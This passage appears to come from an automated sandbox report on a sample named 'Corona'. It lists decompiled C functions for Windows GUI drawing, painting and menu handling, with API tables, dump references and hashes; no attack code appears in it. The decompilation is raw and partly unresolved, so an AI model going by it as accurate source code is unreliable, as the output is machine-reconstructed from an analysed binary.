								E0041C42C( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E0041D2CC(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E00404114( &_v16, 0x43e8b8);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















                                  0x0043e6bc
                                  0x0043e6bd
                                  0x0043e6c7
                                  0x0043e6ca
                                  0x0043e6cd
                                  0x0043e6d0
                                  0x0043e6d2
                                  0x0043e6d7
                                  0x0043e6d8
                                  0x0043e6dd
                                  0x0043e6e0
                                  0x0043e6e5
                                  0x0043e6ea
                                  0x0043e6ee
                                  0x0043e6fe
                                  0x0043e70d
                                  0x0043e710
                                  0x0043e715
                                  0x0043e715
                                  0x0043e715
                                  0x0043e700
                                  0x0043e703
                                  0x0043e703
                                  0x0043e718
                                  0x0043e718
                                  0x0043e724
                                  0x0043e72c
                                  0x0043e752
                                  0x0043e75a
                                  0x0043e75f
                                  0x0043e79d
                                  0x0043e7a2
                                  0x0043e7a6
                                  0x0043e7ab
                                  0x0043e7b7
                                  0x0043e7bf
                                  0x0043e7bf
                                  0x0043e7c4
                                  0x0043e7c8
                                  0x0043e865
                                  0x0043e86d
                                  0x0043e876
                                  0x0043e885
                                  0x0043e88a
                                  0x0043e88c
                                  0x0043e88f
                                  0x0043e892
                                  0x0043e89f
                                  0x0043e7ce
                                  0x0043e7ce
                                  0x0043e7d2
                                  0x0043e7dc
                                  0x0043e7ec
                                  0x0043e7f9
                                  0x0043e802
                                  0x0043e811
                                  0x0043e81e
                                  0x0043e81e
                                  0x0043e823
                                  0x0043e827
                                  0x0043e855
                                  0x0043e860
                                  0x0043e829
                                  0x0043e82e
                                  0x0043e83a
                                  0x0043e83f
                                  0x0043e841
                                  0x00000000
                                  0x00000000
                                  0x0043e84e
                                  0x0043e84e
                                  0x00000000
                                  0x0043e827
                                  0x0043e7c8
                                  0x0043e764
                                  0x0043e772
                                  0x0043e773
                                  0x0043e774
                                  0x0043e775
                                  0x0043e776
                                  0x0043e78b
                                  0x0043e78b
                                  0x00000000
                                  0x0043e72e
                                  0x0043e732
                                  0x0043e745
                                  0x0043e74d
                                  0x00000000
                                  0x0043e74d
                                  0x0043e73a
                                  0x00000000
                                  0x00000000
                                  0x0043e73f
                                  0x0043e743
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043e743

                                  APIs
                                  • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0043E78B
                                  • OffsetRect.USER32(?,00000001,00000001), ref: 0043E7DC
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0043E811
                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 0043E81E
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0043E885
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Draw$OffsetRectText$Edge
                                  • String ID:
                                  • API String ID: 3610532707-0
                                  • Opcode ID: 8a453785712a99c3861b660413ace8f3c5f24bd2fb40b66b0a09eafdf1adcdb0
                                  • Instruction ID: be76095b00cec7cc5de92278f33a3eeb2928d3a82112b1450e0144909ccb8dfd
                                  • Opcode Fuzzy Hash: 8a453785712a99c3861b660413ace8f3c5f24bd2fb40b66b0a09eafdf1adcdb0
                                  • Instruction Fuzzy Hash: BC515170E01204AFDB10FBAAC881B9EB7E5AF49314F14956AF924A73D2C7389D408B59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042C168, Relevance: 7.6, APIs: 5, Instructions: 139threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E0042C168(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t113 = E0042C5B8(_a4 + 0xfffffff7);
				_v24 = _t113;
				_t53 = GetWindow(_t113, 4);
				_t104 =  *0x450fc8; // 0x452bb0
				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E00434EF4(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t13 = _a4 - 0x10; // 0xe87d83e8
					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
					if(_t60 == 0) {
						_t19 = _a4 - 0x10; // 0xe87d83e8
						_t106 =  *0x42abf0; // 0x42ac3c
						__eflags = E00403288( *_t19, _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t21 = _a4 - 0x10; // 0xe87d83e8
							_v32 = E00434EF4( *_t21);
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E0042C0FC);
						_push(GetCurrentThreadId());
						L0040631C();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E004032F8(_t101, _t126);
						_t78 =  *0x452b30; // 0x0
						_t110 =  *0x429988; // 0x4299d4
						if(E00403288(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x452b30; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x452b30; // 0x0
						if(E00434EF4( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E00434EF4(_t116);
					goto L19;
				}
				_t117 = E0042B6D4(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E00434EF4(_t117);
					goto L6;
				}
			}































                                  0x0042c168
                                  0x0042c171
                                  0x0042c173
                                  0x0042c182
                                  0x0042c184
                                  0x0042c18a
                                  0x0042c18f
                                  0x0042c19a
                                  0x0042c1c3
                                  0x0042c1c7
                                  0x0042c2f6
                                  0x0042c2ff
                                  0x0042c2ff
                                  0x0042c1cd
                                  0x0042c1d3
                                  0x0042c1d3
                                  0x0042c1d8
                                  0x00000000
                                  0x00000000
                                  0x0042c1d1
                                  0x0042c1d1
                                  0x0042c1e1
                                  0x0042c1e3
                                  0x0042c1e9
                                  0x00000000
                                  0x00000000
                                  0x0042c1f2
                                  0x0042c1f5
                                  0x0042c1fa
                                  0x0042c21b
                                  0x0042c21e
                                  0x0042c229
                                  0x0042c22b
                                  0x0042c23d
                                  0x0042c23f
                                  0x0042c22d
                                  0x0042c230
                                  0x0042c238
                                  0x0042c238
                                  0x0042c242
                                  0x0042c242
                                  0x0042c246
                                  0x0042c24c
                                  0x0042c252
                                  0x0042c258
                                  0x0042c259
                                  0x0042c263
                                  0x0042c264
                                  0x0042c269
                                  0x0042c26d
                                  0x00000000
                                  0x00000000
                                  0x0042c27b
                                  0x0042c286
                                  0x0042c28b
                                  0x0042c29b
                                  0x0042c2a0
                                  0x0042c2a5
                                  0x0042c2b2
                                  0x0042c2dd
                                  0x0042c2f0
                                  0x0042c2f2
                                  0x0042c2f2
                                  0x00000000
                                  0x0042c2f0
                                  0x0042c2b4
                                  0x0042c2c3
                                  0x00000000
                                  0x00000000
                                  0x0042c2c5
                                  0x0042c2db
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042c2db
                                  0x0042c1ff
                                  0x0042c205
                                  0x0042c205
                                  0x0042c20a
                                  0x00000000
                                  0x00000000
                                  0x0042c203
                                  0x0042c203
                                  0x0042c213
                                  0x00000000
                                  0x0042c213
                                  0x0042c1a4
                                  0x0042c1a8
                                  0x00000000
                                  0x0042c1ae
                                  0x0042c1b2
                                  0x0042c1b2
                                  0x0042c1b7
                                  0x00000000
                                  0x00000000
                                  0x0042c1b0
                                  0x0042c1b0
                                  0x0042c1c0
                                  0x00000000
                                  0x0042c1c0

                                  APIs
                                    • Part of subcall function 0042C5B8: WindowFromPoint.USER32(0042C392,00452B54,00000000,0042C182,?,-0000000C,?), ref: 0042C5BE
                                    • Part of subcall function 0042C5B8: GetParent.USER32(00000000), ref: 0042C5D5
                                  • GetWindow.USER32(00000000,00000004), ref: 0042C18A
                                  • GetCurrentThreadId.KERNEL32 ref: 0042C25E
                                  • 72E7AC10.USER32(00000000,0042C0FC,?,00000000,00000004,?,-0000000C,?), ref: 0042C264
                                  • GetWindowRect.USER32 ref: 0042C27B
                                  • IntersectRect.USER32 ref: 0042C2E9
                                    • Part of subcall function 0042B6D4: GetWindowThreadProcessId.USER32(00000000), ref: 0042B6E1
                                    • Part of subcall function 0042B6D4: GetCurrentProcessId.KERNEL32(?,?,00000000,0044D953,?,?,0044F588,00000001,0044DABF,?,?,?,0044F588), ref: 0042B6EA
                                    • Part of subcall function 0042B6D4: GlobalFindAtomA.KERNEL32 ref: 0042B6FF
                                    • Part of subcall function 0042B6D4: GetPropA.USER32 ref: 0042B716
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
                                  • String ID:
                                  • API String ID: 2049660638-0
                                  • Opcode ID: 9b8f00c982fabec7dbf17187b9b3eb81cf084e59fe4850d40ba6705e678210ba
                                  • Instruction ID: 0184b3c44583206bddfdcfa19fc4174bc128048d644a055b47a46bbb108ca221
                                  • Opcode Fuzzy Hash: 9b8f00c982fabec7dbf17187b9b3eb81cf084e59fe4850d40ba6705e678210ba
                                  • Instruction Fuzzy Hash: 65515D75B002199FCB10DFA9D881AAFB7E4BF08354F5441A6E814EB352D738ED41CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00432BA8, Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00432BA8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E00434EF4(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x432cc8);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E004136F8( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E00432D00(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x432ccf);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E00434EF4(_v8),  &_v84);
				}
				return _t55;
			}


















                                  0x00432ba9
                                  0x00432bab
                                  0x00432bb1
                                  0x00432bb4
                                  0x00432bba
                                  0x00432bbf
                                  0x00432bd3
                                  0x00432bd3
                                  0x00432bd7
                                  0x00432bd8
                                  0x00432bdd
                                  0x00432be0
                                  0x00432bed
                                  0x00432c07
                                  0x00432c0a
                                  0x00432c1d
                                  0x00432c20
                                  0x00432c22
                                  0x00432c23
                                  0x00432c25
                                  0x00432c30
                                  0x00432c39
                                  0x00432c4b
                                  0x00000000
                                  0x00432c4d
                                  0x00432c69
                                  0x00432c70
                                  0x00000000
                                  0x00000000
                                  0x00432c70
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00432c72
                                  0x00432c72
                                  0x00432c73
                                  0x00432c73
                                  0x00432c25
                                  0x00432c76
                                  0x00432c7a
                                  0x00432c83
                                  0x00432c83
                                  0x00432c8e
                                  0x00432bef
                                  0x00432bf6
                                  0x00432bf6
                                  0x00432c9a
                                  0x00432ca1
                                  0x00432ca4
                                  0x00432ca7
                                  0x00432cac
                                  0x00432cb3
                                  0x00000000
                                  0x00432cc2
                                  0x00432cc7

                                  APIs
                                  • BeginPaint.USER32(00000000,?), ref: 00432BCE
                                  • SaveDC.GDI32(?), ref: 00432C02
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 00432C64
                                  • RestoreDC.GDI32(?,?), ref: 00432C8E
                                  • EndPaint.USER32(00000000,?,00432CCF), ref: 00432CC2
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                  • String ID:
                                  • API String ID: 3808407030-0
                                  • Opcode ID: 9bbe7d10dfa805fa30e94fef3aee4c52ba2618f03f19f030b7287df04e414cc8
                                  • Instruction ID: 17d0ccce02ad6be057bbb3d0e7cde5112c0de556dac2e4ead2b1e64afaa1341b
                                  • Opcode Fuzzy Hash: 9bbe7d10dfa805fa30e94fef3aee4c52ba2618f03f19f030b7287df04e414cc8
                                  • Instruction Fuzzy Hash: 8A416070A00204AFCB04DF99C985E9EB7F9FF4D304F15A0AAE5049B362D7799D45CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043E4FC, Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0043E4FC(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E0043E4FC(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0043E62C(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E0043E62C(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0043E62C(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E0043E3BC(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x43d010; // 0x43d05c
						if(E00403288( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0043E62C(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}









                                  0x0043e4fc
                                  0x0043e500
                                  0x0043e506
                                  0x0043e510
                                  0x0043e512
                                  0x00000000
                                  0x0043e512
                                  0x0043e51b
                                  0x0043e520
                                  0x00000000
                                  0x0043e522
                                  0x0043e534
                                  0x0043e539
                                  0x0043e53d
                                  0x0043e542
                                  0x0043e54b
                                  0x0043e555
                                  0x0043e55c
                                  0x0043e56c
                                  0x0043e571
                                  0x0043e571
                                  0x0043e573
                                  0x0043e574
                                  0x0043e57a
                                  0x0043e580
                                  0x0043e5b5
                                  0x0043e5b7
                                  0x0043e5bc
                                  0x00000000
                                  0x0043e5c2
                                  0x0043e585
                                  0x0043e592
                                  0x00000000
                                  0x0043e5a5
                                  0x0043e5a9
                                  0x0043e5b0
                                  0x00000000
                                  0x0043e5b0
                                  0x0043e592
                                  0x0043e57a
                                  0x0043e5c9

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8735c84f0b7003790e44ca07493abb2b21793c90df8ee70cf33f37ac102ac067
                                  • Instruction ID: dc9c0f912c9b1bd9f9057e6902e168c72f6bb9116b3de8094e9aa1fc4fec60df
                                  • Opcode Fuzzy Hash: 8735c84f0b7003790e44ca07493abb2b21793c90df8ee70cf33f37ac102ac067
                                  • Instruction Fuzzy Hash: 5F116061602255AADE60BFBB880575B26899F5875CF04242FBC01973C3EA3DDC05869C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043670C, Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 22%
                                  			E0043670C(void* __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x450e7c; // 0x4528f8
					_t17 =  *0x450e7c; // 0x4528f8
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L00423688();
					_v8 = _t19;
					_push(_t49);
					_push(0x4367cc);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x451104; // 0x452bb4
					E004236C0(_v8, E0044BCE8( *_t21,  *((short*)(__eax + 0x68))));
					_t26 =  *0x451104; // 0x452bb4
					E004236C0(_v8, E0044BCE8( *_t26,  *((short*)(_t39 + 0x68))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L0042370C();
					_push( &_v16);
					_push(0);
					L0042371C();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L0042370C();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x4367d3);
					_t37 = _v8;
					_push(_t37);
					L00423690();
					return _t37;
				}
			}

















                                  0x0043670d
                                  0x0043670f
                                  0x00436713
                                  0x0043671a
                                  0x004367d7
                                  0x00436720
                                  0x00436728
                                  0x00436734
                                  0x0043673b
                                  0x0043673d
                                  0x0043673e
                                  0x00436743
                                  0x00436748
                                  0x00436749
                                  0x0043674e
                                  0x00436751
                                  0x00436758
                                  0x00436769
                                  0x00436772
                                  0x00436783
                                  0x00436788
                                  0x0043678a
                                  0x0043678c
                                  0x00436791
                                  0x00436792
                                  0x0043679a
                                  0x0043679b
                                  0x0043679d
                                  0x004367a5
                                  0x004367a9
                                  0x004367aa
                                  0x004367af
                                  0x004367b0
                                  0x004367b7
                                  0x004367ba
                                  0x004367bd
                                  0x004367c2
                                  0x004367c5
                                  0x004367c6
                                  0x004367cb
                                  0x004367cb

                                  APIs
                                  • 73451AB0.COMCTL32(00000000), ref: 0043673E
                                    • Part of subcall function 004236C0: 73452140.COMCTL32(0042C88E,000000FF,00000000,0043676E,00000000,004367CC,?,00000000), ref: 004236C4
                                  • 73451680.COMCTL32(0042C88E,00000000,00000000,00000000,00000000,004367CC,?,00000000), ref: 00436792
                                  • 73451710.COMCTL32(00000000,?,0042C88E,00000000,00000000,00000000,00000000,004367CC,?,00000000), ref: 0043679D
                                  • 73451680.COMCTL32(0042C88E,00000001,?,00436835,00000000,?,0042C88E,00000000,00000000,00000000,00000000,004367CC,?,00000000), ref: 004367B0
                                  • 73451F60.COMCTL32(0042C88E,004367D3,00436835,00000000,?,0042C88E,00000000,00000000,00000000,00000000,004367CC,?,00000000), ref: 004367C6
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: 7345173451680$7345171073452140
                                  • String ID:
                                  • API String ID: 821207058-0
                                  • Opcode ID: d41354580313031bd698ff731645bd39065cd6c9aae414377b4728281c33a05b
                                  • Instruction ID: dcbc41d2b7e66bae2a91779db5bdf0941149a07cf719c9d70b775f229e795004
                                  • Opcode Fuzzy Hash: d41354580313031bd698ff731645bd39065cd6c9aae414377b4728281c33a05b
                                  • Instruction Fuzzy Hash: 01212F74700214BFEB10EFA9DC82F5973F8EB49705F504496B900DB291DA79EE00C758
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044D8FC, Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044D8FC(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x452664 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E0042B6D4(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E00434EF4(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











                                  0x0044d8fc
                                  0x0044d900
                                  0x0044d902
                                  0x0044d904
                                  0x0044d906
                                  0x0044d90e
                                  0x0044d9ad
                                  0x0044d9b3
                                  0x0044d91f
                                  0x0044d924
                                  0x0044d928
                                  0x0044d98e
                                  0x0044d9ab
                                  0x0044d9ab
                                  0x00000000
                                  0x0044d98e
                                  0x0044d92a
                                  0x0044d92c
                                  0x0044d92c
                                  0x0044d931
                                  0x0044d94c
                                  0x0044d955
                                  0x0044d94a
                                  0x00000000
                                  0x0044d94a
                                  0x0044d95d
                                  0x0044d95f
                                  0x0044d95f
                                  0x00000000
                                  0x0044d93b
                                  0x0044d940
                                  0x0044d961
                                  0x0044d97a
                                  0x0044d97c
                                  0x0044d97c
                                  0x00000000
                                  0x0044d97a
                                  0x0044d931

                                  APIs
                                  • GetCapture.USER32 ref: 0044D91F
                                  • SendMessageA.USER32(00000000,-0000BBEE,0044F588,?), ref: 0044D973
                                  • GetWindowLongA.USER32 ref: 0044D983
                                  • SendMessageA.USER32(00000000,-0000BBEE,0044F588,?), ref: 0044D9A2
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: MessageSend$CaptureLongWindow
                                  • String ID:
                                  • API String ID: 1158686931-0
                                  • Opcode ID: d7bce09c084e79864c26a0f0e8c559bfe6f9b6a287acd860b8918b1764a0547a
                                  • Instruction ID: 5c540d98c193f2d15ea0629be748c67c73d13794cea863b6757e86616bd5d867
                                  • Opcode Fuzzy Hash: d7bce09c084e79864c26a0f0e8c559bfe6f9b6a287acd860b8918b1764a0547a
